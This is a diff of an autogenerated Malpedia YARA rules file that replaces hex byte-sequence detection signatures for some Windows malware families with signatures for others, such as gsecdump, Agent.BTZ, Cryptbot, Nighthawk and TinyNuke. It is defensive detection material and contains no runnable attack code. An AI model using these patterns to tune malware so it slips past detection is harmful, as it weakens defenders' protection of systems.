MALPEDIA_Win_Gsecdump_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c9a7bdf6-1deb-5130-82f0-9b1058e504ad" + id = "b81c271d-e899-564d-95e1-3cec03c5f3c1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.matsnu_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gsecdump_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "e4de93852a1879de4977ea1cd375165f9dcf6c32de8c352e98b35973d623758e" + logic_hash = "6bf60f2f5adb73a31aef591a4e85eec2a9f319786a1094bc7166c02e51c8574f" score = 75 quality = 75 tags = "FILE" @@ -157123,34 +159798,34 @@ rule MALPEDIA_Win_Matsnu_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? 8985bcfbffff 83bdb0fbffff01 0f8588000000 8b85bcfbffff 8985c4fbffff 8b85c0fbffff } - $sequence_1 = { eb04 c647023d 837d1003 7213 } - $sequence_2 = { eb04 c647023d 837d1003 7213 31c0 8a4602 243f } - $sequence_3 = { 8b45e0 3b450c 0f8391000000 c745e800000000 } - $sequence_4 = { 750f c785a4fbffff02000000 e9???????? 8985bcfbffff 83bdb0fbffff01 0f8588000000 8b85bcfbffff } - $sequence_5 = { 85c0 0f84a6000000 8945fc 8b45e0 3b450c } - $sequence_6 = { c78570f3ffff00000000 c78574f3ffff00000000 c78578f3ffff00000000 c7857cf3ffff00000000 } - $sequence_7 = { 751d ff45da ba00000000 8b45da } - $sequence_8 = { 3b45ba 7228 8b7d08 8b4704 3b45ba 751d } - $sequence_9 = { 89e5 81ec18020000 c785e8fdffff00000000 c785ecfdffff00000000 c785f0fdffff00000000 } + $sequence_0 = { c7060f000000 c746fc00000000 c646ec00 83c61c 8d56e8 3bd7 } + $sequence_1 = { 8b442438 50 e8???????? 83c404 8b4c2478 64890d00000000 59 } + $sequence_2 = { 7205 e8???????? 83460401 e9???????? 8b06 83f8fe } + $sequence_3 = { 7376 8bcf c1e105 894d14 03cb 51 50 } + $sequence_4 = { 8d57fe 52 53 8d442430 50 8bce e8???????? } + $sequence_5 = { 51 e8???????? 83c408 85ff 8bf7 0f869afdffff 8b4c2414 } + $sequence_6 = { 50 8d8c24bc000000 c684244401000004 e8???????? 8d4c2428 889c2438010000 e8???????? } + $sequence_7 = { 8b4604 3b442424 0f84a3000000 8b06 83f8fe 7427 85c0 } + $sequence_8 = { 50 e8???????? 8b4538 3bc6 7409 50 e8???????? } + $sequence_9 = { 33d2 59 f7f1 33f6 8d2c95908c4400 8b7d00 85ff } condition: - 7 of them and filesize <606992 + 7 of them and filesize <630784 } -rule MALPEDIA_Win_Nimbo_C2_Auto : FILE +rule MALPEDIA_Win_Agent_Btz_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "89998246-cbee-55ef-81ba-46cc3fd70d1a" + id = "bbd1b361-56e8-5c44-8191-97b61949c3a6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nimbo_c2_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.agent_btz_auto.yar#L1-L506" license_url = "N/A" - logic_hash = "8c39050d61f289d245bf6365ffd110e7ad73787b347fdf5526ee916f50a01d10" + logic_hash = "2cf1b97d42e6d02bf37e0a76317aec03ba7908a0448935a35dc2a10793f4265a" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -157162,32 +159837,82 @@ rule MALPEDIA_Win_Nimbo_C2_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 741a 488b4960 ba22000000 e8???????? 488d4b60 4889c2 e8???????? } - $sequence_1 = { 7434 498b07 b902000000 4899 48f7f9 498b17 31c9 } - $sequence_2 = { e8???????? 4883c470 5b 5e 5f 415c 415d } - $sequence_3 = { 488b4c2428 84c0 740f 4883c430 415c 415d 415e } - $sequence_4 = { 4889f1 4889442420 e8???????? 48ff4608 4883c440 5b 5e } - $sequence_5 = { 7d45 eb49 488b4a10 488b5218 48894810 4889d9 48895018 } - $sequence_6 = { 4d8b2c24 31ff 4c39ef 7de9 498b54fc10 4889f1 48ffc7 } - $sequence_7 = { e8???????? 31d2 4c89e1 498907 e8???????? 4c89e9 488906 } - $sequence_8 = { c1fa0c 83e23f 83ca80 885012 89da 83e33f c1fa06 } - $sequence_9 = { 807c33102d 0f94c0 48ffc6 ebd4 4c89e0 4883c428 5b } + $sequence_0 = { c74608ffffffff f644240801 7409 56 e8???????? 83c404 8bc6 } + $sequence_1 = { ffd6 8d54240c 52 ffd7 } + $sequence_2 = { ffd3 85c0 75d8 5f 5e 5b } + $sequence_3 = { ff15???????? b800000f00 8b4df4 64890d00000000 } + $sequence_4 = { c706???????? c7460c00000000 895e08 895e04 } + $sequence_5 = { b805000f00 8b4df4 64890d00000000 5f 5e } + $sequence_6 = { 895e08 895e04 c7461000000000 895e14 } + $sequence_7 = { 56 6a00 68???????? 8935???????? } + $sequence_8 = { 8b4608 c706???????? 85c0 7413 } + $sequence_9 = { 83f8ff 740e 50 ff15???????? c74608ffffffff f644240801 } + $sequence_10 = { 8d542408 52 c744240c30000000 c744241003000000 } + $sequence_11 = { 6801010000 ff15???????? 85c0 7415 } + $sequence_12 = { 51 6a00 6819000200 6a00 68???????? } + $sequence_13 = { 6a0a 68???????? 6a01 6a00 } + $sequence_14 = { 50 68???????? 6a01 68???????? e8???????? 83c410 } + $sequence_15 = { 6a01 6a04 6a01 68???????? } + $sequence_16 = { 68???????? 6a01 e8???????? 50 e8???????? 83c41c } + $sequence_17 = { 89461c 3dea000000 740b 3de5030000 } + $sequence_18 = { 7511 e8???????? 83c020 50 e8???????? } + $sequence_19 = { 6a01 68???????? e8???????? 83c414 5f 5e } + $sequence_20 = { 50 e8???????? 83c408 6800010000 e8???????? } + $sequence_21 = { 0fb605???????? 66890d???????? 0fb60d???????? 660fafca 6603c8 } + $sequence_22 = { 59 6a69 66894de8 59 } + $sequence_23 = { 5e 8bc3 5b c9 c3 83c8ff eb11 } + $sequence_24 = { c684248d00000065 c684248e00000050 c684248f00000072 c68424900000006f c684249100000063 c684249200000065 } + $sequence_25 = { c68424900000006f c684249100000063 c684249200000065 c684249300000073 c684249400000073 c684249500000057 c684249600000000 } + $sequence_26 = { c684248800000043 c684248900000072 c684248a00000065 c684248b00000061 c684248c00000074 c684248d00000065 c684248e00000050 } + $sequence_27 = { 57 53 897dfc 897e1c } + $sequence_28 = { 59 6a65 668945f0 66894dec 59 6a25 58 } + $sequence_29 = { 59 6a70 66894dea 59 } + $sequence_30 = { c684241601000074 c684241701000045 c684241801000072 c684241901000072 c684241a0100006f c684241b01000072 } + $sequence_31 = { ebd2 c78424a000000068000000 c78424dc00000001000000 33c0 66898424e0000000 } + $sequence_32 = { c684249600000000 c684241001000047 c684241101000065 c684241201000074 c68424130100004c c684241401000061 } + $sequence_33 = { 59 6a70 66894de4 8bc8 } + $sequence_34 = { 51 6a05 ff75fc 897df0 } + $sequence_35 = { c684241201000074 c68424130100004c c684241401000061 c684241501000073 c684241601000074 c684241701000045 c684241801000072 } + $sequence_36 = { 6a00 6a27 6a02 6a00 6a01 } + $sequence_37 = { 8d8505feffff 50 e8???????? 83c40c } + $sequence_38 = { c645d316 c645d43a c645d53b c645d63b } + $sequence_39 = { c645cb30 c645cc27 c645cd3b c645ce30 } + $sequence_40 = { 488b4338 33d2 488bce 448d4220 } + $sequence_41 = { 488b4608 488b0e 48894628 488b4638 4c8d4c2450 448bc3 488bd7 } + $sequence_42 = { 4533c9 488bd6 ff90c8010000 8bf8 85c0 } + $sequence_43 = { 488b4638 488b0e 4c8d442450 4533c9 } + $sequence_44 = { 488bf0 c70005000000 85db 7415 4c8b4f38 } + $sequence_45 = { 488b0f 48894108 488b0f 488b4108 48894128 488b0f } + $sequence_46 = { 83c904 c1e803 448bc9 440fafc8 } + $sequence_47 = { 488bcf c744242088130000 e8???????? 488b5738 } + $sequence_48 = { 488b0f 488901 488b07 488338ff } + $sequence_49 = { 488bce 8bd8 ff92e8010000 488b6c2458 8bc3 488b5c2450 } + $sequence_50 = { 488b0f 894130 eb06 488b07 896830 } + $sequence_51 = { 488b07 896830 33c0 488b5c2458 } + $sequence_52 = { 8d8594faffff 50 68???????? ff15???????? } + $sequence_53 = { 013d???????? 8b04b5100b4200 0500080000 3bc8 } + $sequence_54 = { 0304b5100b4200 59 5e eb05 } + $sequence_55 = { 001cbe 40 0023 d18a0688078a 46 } + $sequence_56 = { 030c85100b4200 eb02 8bcb f6412480 } + $sequence_57 = { 0304b5100b4200 59 eb02 8bc3 } + $sequence_58 = { 0304b5100b4200 59 eb05 b8???????? } + $sequence_59 = { 0304b5100b4200 beffff0000 59 59 } condition: - 7 of them and filesize <1141760 + 7 of them and filesize <5577728 } -rule MALPEDIA_Win_Maggie_Auto : FILE +rule MALPEDIA_Win_Makloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d5276a3c-46d0-5873-87dd-9d6cf0c2cf8b" + id = "66719c32-80e8-5417-8026-25e6d48fb7fe" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.maggie_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.makloader_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "41d76bd3fbb547d408b10f3113f1f0a7db8f68879c6d91dc7c6cf7b7ea8b4803" + logic_hash = "5f1f26214c5086a379f59348aefd7c2032c0ef40c82a5b49aca00ae5277c9d78" score = 75 quality = 75 tags = "FILE" @@ -157201,32 +159926,32 @@ rule MALPEDIA_Win_Maggie_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? e8???????? 84c0 74ec e8???????? } - $sequence_1 = { ff15???????? 83f8ff 750f ff15???????? 2d33270000 f7d8 1bc0 } - $sequence_2 = { 83f8ff 750f ff15???????? 2d33270000 f7d8 1bc0 } - $sequence_3 = { 750f ff15???????? 2d33270000 f7d8 1bc0 } - $sequence_4 = { ff15???????? 83f8ff 750f ff15???????? 2d33270000 f7d8 } - $sequence_5 = { 83f8ff 750f ff15???????? 2d33270000 f7d8 } - $sequence_6 = { b8ff000000 663b05???????? 7505 e8???????? e8???????? 84c0 } - $sequence_7 = { 663b05???????? 7505 e8???????? e8???????? 84c0 } - $sequence_8 = { 7511 ff15???????? 85c0 7407 33c0 } - $sequence_9 = { 7511 ff15???????? 85c0 7407 33c0 e9???????? } + $sequence_0 = { 8a11 88955ce6ffff 838530e6ffff01 80bd5ce6ffff00 } + $sequence_1 = { 8d45f0 64a300000000 f2c3 8b4de4 33cd f2e8a8e9feff } + $sequence_2 = { 8d8de4fcffff 898d30e5ffff 8d95d8e5ffff 899534e5ffff 8d8530e5ffff 50 } + $sequence_3 = { 8b45d4 50 e8???????? 83c408 8945d4 837dd000 } + $sequence_4 = { 8b9540e5ffff 8bca c1e902 f3a5 8bca } + $sequence_5 = { 68???????? e8???????? 83c404 83f0ff 50 0fb695e5e5ffff } + $sequence_6 = { 3bf3 72e9 5f 5e 5b c3 56 } + $sequence_7 = { 51 e8???????? 83c404 ba01000000 6bca05 8b5508 } + $sequence_8 = { 8d95e0f3ffff 52 8d8d70e6ffff e8???????? 8d8570ffffff } + $sequence_9 = { 89856ce6ffff 6a4b 6a00 8d55b0 52 e8???????? 83c40c } condition: - 7 of them and filesize <611328 + 7 of them and filesize <335872 } -rule MALPEDIA_Win_Aukill_Auto : FILE +rule MALPEDIA_Win_Cryptbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a6d13b29-a1c3-5db7-ac5c-09009229e7b9" + id = "1c6d7eb4-b0bc-5398-a1c7-a56c78dd600a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aukill" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.aukill_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptbot_auto.yar#L1-L150" license_url = "N/A" - logic_hash = "ebc3504ab44ddd68fe35d4be4361ca674b2d7f3006cec23148755c773291be1b" + logic_hash = "09f972034d92b74b2b134cacc0a51ffba015046eb0d41dcfb99ea848a8d7ad71" score = 75 quality = 75 tags = "FILE" @@ -157240,73 +159965,78 @@ rule MALPEDIA_Win_Aukill_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 751f 488b4c2458 ff15???????? } - $sequence_1 = { 0fb7da 8bf9 e8???????? 4c8bc8 4533c0 } - $sequence_2 = { 4533c0 33d2 488bcb ff15???????? 85c0 7526 488bcb } - $sequence_3 = { 4889442420 ff15???????? 85c0 751f 488b4c2458 ff15???????? } - $sequence_4 = { 751d 488bcb ff15???????? ff15???????? } - $sequence_5 = { 4489442420 453b01 7346 4b8d1440 410f104cd108 0f114c2428 f2410f1044d118 } - $sequence_6 = { 448d4920 48894c2450 488b0d???????? 48897c2458 } - $sequence_7 = { 488bd3 33c9 ff15???????? 85c0 751f } - $sequence_8 = { 48895c2408 57 4883ec60 488bfa 8bd9 e8???????? 33c9 } - $sequence_9 = { ffc2 80f920 75ee 4c63c2 } + $sequence_0 = { 33c0 85ed 0f94c0 8be8 } + $sequence_1 = { 33c0 eb0a b917d90000 e8???????? } + $sequence_2 = { e9???????? b949dc0000 e9???????? b944dc0000 e9???????? b964dc0000 } + $sequence_3 = { e8???????? 85c0 750c b961030200 e8???????? } + $sequence_4 = { 0f9cc0 eb02 32c0 84c0 } + $sequence_5 = { eb0c b99fed0000 e8???????? 8907 } + $sequence_6 = { e8???????? 85c0 750e b9ca070200 e8???????? 8bc8 } + $sequence_7 = { e8???????? 85c0 750f b955960100 e8???????? e9???????? } + $sequence_8 = { 744e 0fb74802 83e103 3bcb } + $sequence_9 = { 750b 8bce e8???????? 8b4c2428 } + $sequence_10 = { 7508 85f6 7404 c6464101 5e c3 } + $sequence_11 = { 7518 8b542414 83c718 8bcd } + $sequence_12 = { 7409 33d2 e8???????? 8bf8 43 } + $sequence_13 = { 2403 80e110 8ad1 3c02 7509 } + $sequence_14 = { 751f 8bd5 8bce e8???????? } condition: - 7 of them and filesize <446464 + 7 of them and filesize <11116544 } -rule MALPEDIA_Win_Unidentified_073_Auto : FILE +rule MALPEDIA_Win_Flowershop_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0ba61f73-e46a-5f54-853f-f1f3b502ee26" - date = "2022-08-05" - modified = "2022-08-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_073_auto.yar#L1-L125" + id = "8ec68082-5d4c-584e-ad88-66456b2a097b" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flowershop_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "8100472ca712d569bbcdb570af72e3f13986092b4d8ee8e3873da55bef76232d" + logic_hash = "f019e2c8acff91329c227db3e65589276d7267039537efb349a1a4ca0b28047b" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20220805" - malpedia_hash = "6ec06c64bcfdbeda64eff021c766b4ce34542b71" - malpedia_version = "20220808" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8538ffffff 6a00 c746180f000000 8bce } - $sequence_1 = { c684242801000019 e8???????? 68???????? 8d8c24c0000000 e8???????? 6aff } - $sequence_2 = { 8bce c7461400000000 50 c6460400 e8???????? 83ec1c 8bf4 } - $sequence_3 = { 7846 8b451c 8b0e 2bc1 3bc3 7c53 } - $sequence_4 = { 8b0d???????? 894df8 eb09 8b55f8 83ea01 8955f8 837df800 } - $sequence_5 = { 6a00 8d8424dc000000 50 8d4c2454 e8???????? 83ec1c 8d84240c010000 } - $sequence_6 = { 8bec 51 894dfc c705????????90664a00 833d????????00 741c } - $sequence_7 = { 6bd103 8982a0784a00 68???????? 8b45fc 50 ff15???????? } - $sequence_8 = { 0fb74df8 894de0 668b55e0 668955f8 0fb745fc 0fb74df8 3bc1 } - $sequence_9 = { 57 6aff 68???????? 50 ff15???????? } + $sequence_0 = { 0f857d030000 e9???????? 8325????????00 8b15???????? 85d2 760b 8bca } + $sequence_1 = { ff750c ff15???????? 8bf0 d1e6 0fb7c6 50 8d470a } + $sequence_2 = { 33f6 85c0 761e bb???????? 53 57 e8???????? } + $sequence_3 = { 8b45f0 8b3d???????? 8db008010000 56 6a08 ffd7 50 } + $sequence_4 = { 33ff 80240100 217dfc 8d450c 50 8d4508 50 } + $sequence_5 = { 85c0 740a 3b4514 7705 6a01 58 eb02 } + $sequence_6 = { c3 895104 c3 56 8b742408 57 8b4604 } + $sequence_7 = { e8???????? 33c0 eb7b 6a01 5e 837c241005 7c5e } + $sequence_8 = { 33c0 5f 2bd1 c7450824000000 3b7d0c 7712 8b5c0afc } + $sequence_9 = { 33f6 eb4b 8b7d08 3b7dfc 741c 8d45fc 50 } condition: - 7 of them and filesize <1974272 + 7 of them and filesize <829440 } -rule MALPEDIA_Win_Rdat_Auto : FILE +rule MALPEDIA_Win_Nighthawk_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "92191fa2-5f3d-5b42-a025-816ea5c7ba9a" + id = "046bd4e8-fb79-5079-9bf0-a25651c08679" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rdat_auto.yar#L1-L164" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nighthawk" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nighthawk_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "258a7b0e2fbdc995f078ce1c969b2a27e77e31fae7722d9e4f1fdbfa2416146c" - score = 60 - quality = 45 + logic_hash = "f6ef6ce19d4a02a93b282663ef6578b1629bc3c4125b3116c888694bf074ff3d" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -157318,38 +160048,32 @@ rule MALPEDIA_Win_Rdat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3b7744 0f8c19ffffff 8b87ac020000 33ed } - $sequence_1 = { 48ffc3 4038341a 75f7 4883791810 488b7910 7203 488b09 } - $sequence_2 = { 4863ed 4885ed 0f8ed8000000 8b54b430 } - $sequence_3 = { 4c8bc3 4c0f42c7 4d85c0 7504 8bc6 } - $sequence_4 = { 4889442470 448bb910010000 4532e4 448aea 488bd9 4585ff 0f8e1e020000 } - $sequence_5 = { 4533ff 4c8bf1 44397944 0f8e64010000 } - $sequence_6 = { 48894108 4c8b05???????? 488b15???????? 89442420 4d85c0 } - $sequence_7 = { 488b09 483bfb 4c8bc3 4c0f42c7 } - $sequence_8 = { 45380401 75f7 4c8bc0 498bd1 488d4c2438 } - $sequence_9 = { e8???????? 4898 4885c0 751e 483bfb 7313 83c8ff } - $sequence_10 = { 85c0 740b b9e8030000 ff15???????? } - $sequence_11 = { 4863f0 33d2 8bc2 48c1e006 } - $sequence_12 = { 3b566c 0f8d9e000000 488b4660 3b5668 7c1d 2b5668 } - $sequence_13 = { 7203 488b00 4c8bc0 498bd7 488d4de0 } - $sequence_14 = { 0f84f5000000 4883f910 7205 488b07 } - $sequence_15 = { 488d8c2490060000 e8???????? 90 488b942490060000 803a00 7505 4d8bc6 } + $sequence_0 = { 8983a8000000 4c397d0f 720f 488b4df7 4885c9 7406 e8???????? } + $sequence_1 = { ff15???????? 48897b48 48837b3808 720e 488b4b20 4885c9 7405 } + $sequence_2 = { 740d 0f104030 448d7701 0f11442420 498d4f30 ff15???????? 4585f6 } + $sequence_3 = { 4c8bd2 488d354b95f5ff 4183e20f 488bfa 492bfa 488bda 4c8bc1 } + $sequence_4 = { 7419 e8???????? 488b5310 41b801000000 488bc8 e8???????? eba5 } + $sequence_5 = { ff15???????? 85c0 0f844a040000 448b4510 4c897588 4c897598 458d7e0f } + $sequence_6 = { 8b02 418901 890a e9???????? 418b08 418b03 418900 } + $sequence_7 = { 4903ca 4b890c01 eb34 6683f803 7509 4923ce 46011401 } + $sequence_8 = { 488d542470 488d4d20 e8???????? 488bd0 488d4d40 e8???????? 90 } + $sequence_9 = { 4c894c2448 4c89642440 4c89642438 4489642430 48894c2428 4889442420 4533c9 } condition: - 7 of them and filesize <1573888 + 7 of them and filesize <1949696 } -rule MALPEDIA_Win_Adkoob_Auto : FILE +rule MALPEDIA_Win_Gameover_Dga_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "09ef20a4-923f-52b9-be25-7277d044ed19" + id = "49ca0960-3057-5b3f-bfaa-26bec43ff964" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.adkoob_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gameover_dga_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "0f163717fb5860f8982d25c9dbbe18c357f664ad9d46a5bfca06cc794c00bf30" + logic_hash = "04f58b9dead2fa0c3d00122a20892474bd44e61e3b7f09f6fdc5edfc6227d8a8" score = 75 quality = 75 tags = "FILE" @@ -157363,34 +160087,34 @@ rule MALPEDIA_Win_Adkoob_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff706c ffb0b0000000 8bc7 6a14 59 99 f7f9 } - $sequence_1 = { ff75f0 6a38 5a e8???????? 83c40c 8bce 40 } - $sequence_2 = { 8d5801 e9???????? 53 8bcf e8???????? 8b5dd8 84c0 } - $sequence_3 = { 8955f8 8b90d4000000 0fb6443b06 c1e108 0bc8 897de8 2bf1 } - $sequence_4 = { ff504c 85c0 7536 8b75dc 56 ff15???????? 50 } - $sequence_5 = { 8b7508 83fe09 7756 80beac1d4c0000 57 8b3d???????? 0f453d???????? } - $sequence_6 = { ff75e8 ff15???????? 837dd000 8b35???????? 7405 ff75d0 ffd6 } - $sequence_7 = { ff742418 68???????? e8???????? 83c40c 89442428 85c0 747b } - $sequence_8 = { ff7510 8bce ffb578ffffff ff75b8 ff7598 ffb564ffffff ff75c4 } - $sequence_9 = { 8b4744 52 50 8b08 ff5114 59 59 } + $sequence_0 = { 884617 33c0 40 e9???????? 8a4601 33db 8b6c2434 } + $sequence_1 = { 397e08 0f84f0000000 8be9 894c2414 8bd1 8b4604 8a0c03 } + $sequence_2 = { 48 7544 397714 763f 8b4710 ff34b0 } + $sequence_3 = { 833d????????00 7566 8d8de8fdffff e8???????? 51 be???????? 56 } + $sequence_4 = { 5f 5b c20c00 8bcf e8???????? 8bf0 } + $sequence_5 = { 56 ff15???????? 85c0 7443 56 be???????? 8d85f8fdffff } + $sequence_6 = { 8b84245c010000 40 e9???????? 8b476c 33c9 2bc3 } + $sequence_7 = { ff760c ff7608 6a10 e8???????? 84c0 0f847a010000 8364241c00 } + $sequence_8 = { e8???????? a1???????? ff7064 ff15???????? 6a53 8d55b8 8bf0 } + $sequence_9 = { 7510 8b4f10 e8???????? 85c0 75e5 32c0 } condition: - 7 of them and filesize <1867776 + 7 of them and filesize <540672 } -rule MALPEDIA_Win_Mirage_Auto : FILE +rule MALPEDIA_Win_Tinynuke_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1bf63709-182f-50be-a8ab-e40f87c0e4e9" + id = "d780fd7f-583b-590f-a92f-7ac4fac52f1d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mirage_auto.yar#L1-L173" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tinynuke_auto.yar#L1-L294" license_url = "N/A" - logic_hash = "dc6fe884f3e04eb4b8ba5e715519d9f15ffa67807a8e3bc171df65981afb64ab" + logic_hash = "f182ca1cbc1a4db59bec12699d68404bb9da6364ccc0407277f19ab284be21eb" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -157402,38 +160126,54 @@ rule MALPEDIA_Win_Mirage_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6801000080 ff15???????? 85c0 7556 } - $sequence_1 = { 50 6a01 6a06 c645ff01 } - $sequence_2 = { a0???????? 8d8d90feffff ff35???????? 50 ff75ec ff75e8 e8???????? } - $sequence_3 = { 50 8d857cfdffff 50 e8???????? 59 59 8d8580feffff } - $sequence_4 = { 3b4510 894514 731f 6802800000 8d8520010000 53 } - $sequence_5 = { ff7518 e8???????? 83c41c 85ff 7613 8b4518 57 } - $sequence_6 = { 50 53 68???????? c745f804010000 ff75fc ff15???????? } - $sequence_7 = { 395df4 0f85b1000000 3bf3 0f85a9000000 381f } - $sequence_8 = { ff7518 03fb e8???????? 33db 59 } - $sequence_9 = { 57 8b7d18 8bf1 8d5f19 88461c 53 e8???????? } - $sequence_10 = { e8???????? 50 8d8520f9ffff e9???????? } - $sequence_11 = { 85c0 5e 7507 8b45f8 } - $sequence_12 = { 50 8b08 ff517c 8b06 8d55f4 52 50 } - $sequence_13 = { e8???????? 8d45e4 56 83c704 } - $sequence_14 = { ff15???????? 8d85f4f0ffff 53 50 68???????? 56 e8???????? } - $sequence_15 = { 56 50 e8???????? 83c414 e9???????? ff75f0 e8???????? } + $sequence_0 = { c3 55 8bec 817d0c00040000 } + $sequence_1 = { 6aff ff7508 6a00 68e9fd0000 ff15???????? 8bc3 5b } + $sequence_2 = { 7625 53 8b5d08 57 8b7d10 57 } + $sequence_3 = { ff35???????? a3???????? 57 ff15???????? ff35???????? 8b7dfc } + $sequence_4 = { 50 56 57 ff35???????? c745f801000000 } + $sequence_5 = { 8d8530f6ffff 50 6802020000 ff15???????? 85c0 } + $sequence_6 = { 8945f4 8d85d4feffff 50 ff15???????? } + $sequence_7 = { 6a03 53 53 6800000080 50 ff15???????? a3???????? } + $sequence_8 = { ff75ec ff75fc e8???????? 83c40c 5f } + $sequence_9 = { ff15???????? ff35???????? 8d85a4feffff 50 } + $sequence_10 = { 8d85a4feffff 50 ff15???????? ff35???????? } + $sequence_11 = { ff15???????? a3???????? ff35???????? ff75f8 } + $sequence_12 = { a3???????? 68e2010000 68???????? 68???????? e8???????? } + $sequence_13 = { e8???????? eb18 83f803 7519 } + $sequence_14 = { 59 a3???????? c9 c3 55 } + $sequence_15 = { 6a2a 50 8945fc ff15???????? } + $sequence_16 = { a3???????? ff35???????? ff75ec ff15???????? } + $sequence_17 = { 8a00 3c0a 7409 3c0d } + $sequence_18 = { 50 8d85f0fdffff 50 ff15???????? ff75fc 8d85f0fdffff } + $sequence_19 = { ff15???????? 8d85d0fcffff 50 e8???????? 59 } + $sequence_20 = { ff15???????? 8b35???????? 8d430c 50 } + $sequence_21 = { 8b0f 85c9 742a 8d440b02 85c9 } + $sequence_22 = { 8b44241c 8bb0a0000000 2b6834 01de 8b16 85d2 } + $sequence_23 = { 8bb90000e06e 0f848e000000 83fa20 0f84f0000000 83fa08 0f84b4000000 } + $sequence_24 = { 890424 89442418 e8???????? 89c3 } + $sequence_25 = { ffd6 57 53 ffd6 5f 5e 8bc3 } + 